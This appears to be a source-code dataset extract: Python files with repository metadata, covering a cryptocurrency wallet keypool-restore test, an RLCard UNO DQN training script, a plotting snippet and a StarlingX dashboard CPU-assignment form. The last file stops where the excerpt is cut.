plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file:
false_prob_values_HMC = pickle.load(file)
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| true | true |
f7191b74ad043bf5a88f00d42e710de35f6e22dd | 2,969 | py | Python | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test HD Wallet keypool restore function.
Two nodes. Node1 is under test. Node0 is providing transactions and generating blocks.
- Start node1, shutdown and backup wallet.
- Generate 110 keys (enough to drain the keypool). Store key 90 (in the initial keypool) and key 110 (beyond the initial keypool). Send funds to key 90 and key 110.
- Stop node1, clear the datadir, move wallet file back into the datadir and restart node1.
- connect node1 to node0. Verify that they sync and node1 receives its funds."""
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
# wallet was not backupped after emptying the key pool.
# Legacy wallet can't recover funds in addr_extpool
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| 37.582278 | 164 | 0.67969 |
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| true | true |
f7191b7831ff3bb9f706d295c3c5cdd09d24319d | 2,516 | py | Python | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | null | null | null | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | null | null | null | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | 1 | 2020-11-20T16:38:37.000Z | 2020-11-20T16:38:37.000Z | ''' A toy example of training single-agent algorithm on Leduc Hold'em
The environment can be treated as normal OpenAI gym style single-agent environment
'''
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
# Set the iterations numbers and how frequently we evaluate the performance
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
# The intial memory size
memory_init_size = 1000
# Train the agent every X steps
train_every = 1
# The paths for saving the logs and learning curves
log_dir = './experiments/uno_single_dqn_result/'
# Set a global seed
set_global_seed(0)
with tf.Session() as sess:
# Initialize a global step
global_step = tf.Variable(0, name='global_step', trainable=False)
# Set up the agents
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
# Initialize global variables
sess.run(tf.global_variables_initializer())
# Init a Logger to plot the learning curve
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
# Close files in the logger
logger.close_files()
# Plot the learning curve
logger.plot('DQN')
# Save model
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| 29.255814 | 86 | 0.657393 |
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
memory_init_size = 1000
train_every = 1
log_dir = './experiments/uno_single_dqn_result/'
set_global_seed(0)
with tf.Session() as sess:
global_step = tf.Variable(0, name='global_step', trainable=False)
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
sess.run(tf.global_variables_initializer())
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
logger.close_files()
logger.plot('DQN')
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| true | true |
f7191be16d1b89c72207a7ef5c87366a86c4b09c | 17,228 | py | Python | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | 1 | 2018-09-18T11:10:53.000Z | 2018-09-18T11:10:53.000Z | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | null | null | null | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse # noqa
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99: # No Processor
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99: # No Processor
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99: # No Processor
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99: # No Processor
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99: # No Processor
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99: # No Processor
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99: # No Processor
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99: # No Processor
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99): # No Processor
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
# host_id = cleaned_data.get('host_id')
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
# Since only vswitch is allowed to be modified
cleaned_data['function'] = 'vswitch'
# NOTE: shared_vcpu can be changed
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
# host_id = cleaned_data.get('host_id')
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| 43.07 | 79 | 0.557755 |
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99:
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99:
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99:
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99:
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99:
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99:
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99:
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99:
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99):
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
cleaned_data['function'] = 'vswitch'
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
